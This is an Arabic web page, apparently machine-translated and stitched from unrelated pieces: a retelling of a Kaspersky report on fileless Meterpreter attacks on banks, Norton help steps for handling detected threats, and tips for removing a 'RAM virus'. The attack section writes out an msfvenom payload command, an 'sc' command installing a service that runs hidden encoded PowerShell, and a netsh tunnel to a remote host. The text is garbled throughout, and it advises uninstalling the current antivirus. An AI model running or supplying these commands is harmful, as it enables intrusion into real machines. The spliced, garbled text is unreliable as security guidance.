عرض وإصلاح تهديدات أمان الجهاز التي اكتشفها Norton. البرامج الضارة "غير المرئية" لا تترك أي ملفات ، وتختبئ في الذاكرة وتهاجم الشركات الكبيرة إصلاح التهديدات التي لم يتم التخلص منها أثناء الفحص

حول حملة برمجيات خبيثة جديدة ومثيرة للاهتمام أثرت على البنوك وشركات الاتصالات والهيئات الحكومية ، بالإضافة إلى شركات ومؤسسات أخرى في أكثر من أربعين دولة حول العالم.

يكتب محللو فريق GReAT أن المتخصصين في فريق الأمن المصرفي كانوا أول من لاحظ التهديد: ثم في ذاكرة جسديةوحدة تحكم المجال ، تم العثور على معرف Meterpreter. تتعرف منتجات Kaspersky Lab على مشكلات مثل MEM: Trojan.Win32.Cometer و MEM: Trojan.Win32.Metasploit. عندما بدأ المحللون في الفهم ، محاولين فهم مصدر الكود في الذاكرة ، وجدوا أيضًا نصوص PowerShell النصية في سجل ويندوز، وأداة NETSH التي تم استخدامها لتوجيه حركة المرور إلى خادم القيادة والتحكم للمهاجمين.

تسمى مثل هذه الهجمات "بدون ملفات" (fileless) ، أي أن البرامج الضارة لا تضع أي ملفات على القرص الصلب ، وبدلاً من ذلك ، يتم تضمين الحمولة مباشرة في الذاكرة وتوجد داخل ذاكرة الوصول العشوائي. بطبيعة الحال ، من الصعب للغاية اكتشاف وتعقب مثل هذا الهجوم.

مخطط الهجوم

يوضح الباحثون أنه يمكن استخدام إطار عمل Metasploit المعروف على نطاق واسع لإنشاء نصوص ، كما في المثال أدناه.

نصوص مثل هذه تساعد على حقن Meterpreter في ذاكرة الوصول العشوائي. يمكن استخدام Msfvenom من Metasploit لتوليدها:

msfvenom -p windows / meterpreter / bind_hidden_tcp AHOST = 10.10.1.11 -f psh-cmd

بمجرد إنشاء البرنامج النصي ، يستخدم المهاجمون Windows SC لتثبيت خدمة ضارة على المضيف الهدف (والذي سينفذ في النهاية البرنامج النصي أعلاه). يمكن القيام بذلك ، على سبيل المثال ، باستخدام الأمر التالي:

sc \\ target_name قم بإنشاء ATITscUA binpath = "C: \ Windows \ system32 \ cmd.exe / b / c start / b / min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…" بدء = يدوي

الخطوة التالية هي إعداد النفق بحيث تصبح الآلة المصابة متاحة للمضيف البعيد. للقيام بذلك ، يلجأ المهاجمون إلى الأمر التالي:

netsh واجهة portproxy إضافة v4tov4 listenport = 4444 connectaddress = 10.10.1.12 connectport = 8080 listenaddress = 0.0.0.0

نتيجة لذلك ، ستتم إعادة توجيه جميع حركات مرور الشبكة من 10.10.1.11:4444 إلى 10.10.1.12:8080. تسمح لك هذه التقنية بإعداد نفق وكيل يمكن من خلاله للمجرمين التحكم عن بعد في مضيف PowerShell المصاب.

يلاحظ المحللون أن استخدام SC و NETSH يتطلب امتيازات المسؤول على المضيف المحلي والبعيد. سيتطلب استخدام البرامج النصية الخبيثة من PowerShell أيضًا تصعيد الامتياز وإجراء تغييرات على سياسة التنفيذ. للقيام بذلك ، يستخدم المهاجمون أداة تفريغ بيانات اعتماد Mimikatz لجمع كلمات المرور من الحسابات على الجهاز المحلي ومحطات العمل المحيطة.

بعد دراسة دقيقة للهجوم على أحد البنوك المتضررة ، توصل الباحثون إلى استنتاج مفاده أن مشغلي هذه الحملة استخدموا نطاقات المستوى الثالث ، بالإضافة إلى مجالات في مناطق .GA ، .ML ، .CF. الحقيقة هي أن هذه المجالات مجانية ، مما يعني أن المهاجمين لا يتركون وراءهم معلومات WHOIS.

تلخيص كل ما سبق (باستخدام Metasploit والمعيار المرافق ويندوز، المجالات التي لا تحتوي على معلومات WHOIS) ، خلص الباحثون إلى أن الكتابة اليدوية لمهاجمين مجهولين تشبه إلى حد بعيد عمل مجموعات مثل GCMAN و Carbanak. ومع ذلك ، لا يوجد دليل مباشر ، لذلك لا يمكن ربط هذه الهجمات الصامتة بأي مجموعة معينة.

أصبحت تقنيات مثل تلك الموصوفة في هذا التقرير أكثر شيوعًا ، خاصة [عند تنفيذ الهجمات] ضد أهداف كبيرة في الصناعة المصرفية. لسوء الحظ ، فإن استخدام الأدوات البسيطة ، جنبًا إلى جنب مع الحيل المختلفة ، يجعل من الصعب للغاية اكتشاف [مثل هذه الهجمات] ، يلخص خبراء GReAT.

عندما يكتشف Norton تهديدًا ، يقوم البرنامج بإزالته تلقائيًا ، ما لم يكن تدخلك ضروريًا لتحديد كيفية التعامل مع التهديد. في مثل هذه الحالات ، يعرض Norton إشعار "تم اكتشاف تهديدات" أو "تهديد أمان" مع الخيارات المتاحة للرد على التهديد.

اعرض التهديدات التي تم حلها تلقائيًا أثناء الفحص

    قم بتشغيل Norton.

    أمان الجهاز، انقر فوق فتح.

    فى الشباك سجل الأمان التهديدات الأمنية التي تم حلها.

    حدد تهديدًا من القائمة واعرض الإجراءات المكتملة في لوحة التفاصيل.

في بعض الحالات ، بدلاً من الإصلاح التلقائي للتهديد ، يوصي Norton بأن تتخذ إجراءً محددًا لإصلاحه.

إصلاح التهديدات التي لم يتم إصلاحها أثناء الفحص

    قم بتشغيل Norton.

    إذا ظهرت نافذة My Norton بجوار ملف أمان الجهاز، انقر فوق فتح.

    في نافذة Norton الرئيسية ، انقر نقرًا مزدوجًا فوق الأمان ثم حدد المحفوظات.

    فى الشباك سجل الأمانفي قائمة العرض ، حدد التهديدات الأمنية التي لم يتم حلها.

    إذا كانت القائمة تحتوي على تهديدات لم يتم حلها ، فحدد التهديد الذي تهتم به.

إذا كان هناك سبب للاعتقاد بأن النظام مصاب ، فقم بتشغيل Norton Power Eraser. Norton Power Eraser هو علاج قويإزالة البرامج الضارة للتخلص من التهديدات الأمنية الأكثر مقاومة. لمزيد من المعلومات ، انظر الوثيقة تشغيل Norton Threat Detection Scan على جهاز الكمبيوتر الخاص بك

Norton Power Eraser هي أداة لإزالة البرامج الضارة تعمل في الوضع العدواني. في بعض الأحيان مع البرمجيات الخبيثةيمكن لـ Norton Power Eraser إزالة الملفات الشرعية ، لذا قم بمراجعة نتائج الفحص بعناية قبل حذف أي ملفات.

بشكل افتراضي ، يزيل Norton تهديدات الأمان من جهاز الكمبيوتر الخاص بك ويعزلها. إذا كان هناك سبب للاعتقاد بأن الملف قد تم حذفه عن طريق الخطأ ، فيمكن عندئذٍ استعادته من العزل إلى موقعه الأصلي واستبعاده من عمليات الفحص اللاحقة.

استعادة ملف من العزل

    قم بتشغيل Norton.

    إذا ظهرت نافذة My Norton بجوار ملف أمان الجهاز، انقر فوق فتح.

    في نافذة Norton الرئيسية ، انقر فوق الأمان ، ثم حدد المحفوظات.

    فى الشباك سجل الأمانقم بتوسيع قائمة العرض وحدد خيار العزل.

    حدد الملف المراد استعادته.

    في لوحة التفاصيل ، انقر فوق الخيارات.

    فى الشباك التهديد المكتشفحدد فريق استعادة واستبعاد هذا الملف.

    فى الشباك التعافي من الحجر الصحيانقر فوق الزر "نعم".

    في نافذة الاستعراض بحثًا عن مجلد ، حدد مجلدًا أو محرك أقراص لوضع الملف المستعاد ، ثم انقر فوق موافق.

فيروس في ذاكرة الوصول العشوائي، هذه الظاهرة مزعجة للغاية ولسوء الحظ ليست نادرة. غالبًا ما نرى ملفًا مخفيًا ولكن لا يمكننا حذفه بأي شكل من الأشكال - يستمر في الظهور والظهور ، أو نظام التشغيل نفسه نظام ويندوزلا يسمح بذلك.

بالمناسبة ، يتجلى في كثير من الأحيان في الحالات الإعداد الخاطئمضاد للفيروسات أو عدمه. إذا كان لديك مثل هذا الموقف ، فأوصيك بقراءة المقال - تثبيت وتكوين برنامج مكافحة فيروسات على Windows. قبل إزالة فيروس من ذاكرة الوصول العشوائي ، يجب عليك معرفة ما يحدث مع برنامج مكافحة الفيروسات المثبت على جهاز الكمبيوتر الخاص بك. على الأرجح ، تم "تدمير" برنامج مكافحة الفيروسات الخاص بك بواسطة فيروس ظهر. ومن المحتمل أيضًا أن ترسانة توقيع برنامج مكافحة الفيروسات الخاص بك لا تحتوي على طريقة لمحو الفيروس تمامًا من المجموعة في الوقت المناسب ويحاول البرنامج إزالة عدوى فيروسيةليس الفيروس نفسه.

غالبًا ما تكون هناك مواقف ينقل فيها فيروس برامج وملفات إضافية لعمله الخاص ، أو يبدأ تلقائيًا في العمل ، والآن سيكتشف برنامج مكافحة الفيروسات هذه النسخ ، لكنه لن يكتشف الكود المصدري (الفيروس) ، وفي معظم الحالات لا يمكنه التعامل معه هو - هي.

  1. نقوم بإزالة (باستخدام برنامج إلغاء التثبيت - إضافة / إزالة البرامج) برنامج مكافحة الفيروسات المثبت ، فهو عديم الفائدة هنا.
  2. قم بتنزيل Ccleaner من الإنترنت وتثبيته. لنبدأ ، أولاً نقوم بمسح المجلدات المؤقتة. هذا البرنامج مناسب مستخدمين عاديين، بناءً على ذلك ، من الممكن وضع جميع مربعات الاختيار فيه الإعدادات - مخصصلن يمحو البيانات! لقد كتبت المزيد عن البرنامج في المقالة - تنظيف السجل.
  3. ثم نحتاج إلى أداة تنظيف الفيروسات لمساعدتنا. لقد كتبت عنهم في المقال - أدوات مجانية لإزالة الفيروسات. نختار أي. على سبيل المثال ، قم بتنزيل برنامج Dr.web Cure it من الإنترنت وتثبيته.
  4. نقوم بتثبيت التحديث وتشغيل أحد عمليتي الفحص (سريع أو كامل). المسح السريع يعطي نتيجة فعالة من حيث المبدأ. يتم إزالة كافة الفيروسات التي تم الكشف عنها. نعيد تشغيل الكمبيوتر.
  5. تنزيل برنامج مكافحة فيروسات جديد. مهم بشكل أساسي! إذا تم تثبيت برنامج مكافحة الفيروسات Eset NOD32 antivirus قبل حدوث مشكلة ، فقم بتثبيت Avast أو Avira ، إذا تم تثبيت Avast ، أو تثبيت Eset ، أو أي برنامج مكافحة فيروسات آخر من اختيارك.
  6. من السهل جدًا تفسير مثل هذه الإجراءات ، فبرنامج مكافحة الفيروسات الذي من المحتمل أن يكون قد تعرض للتلف ، ويمكن أن تظل البيانات الموجودة في السجل ، وهذا سيؤدي إلى تشغيل غير دقيق لبرنامج مكافحة الفيروسات ، خاصة وأن برنامج مكافحة الفيروسات المحدد هذا لم يجد تهديد من الإنترنت على جهاز الكمبيوتر الخاص بك.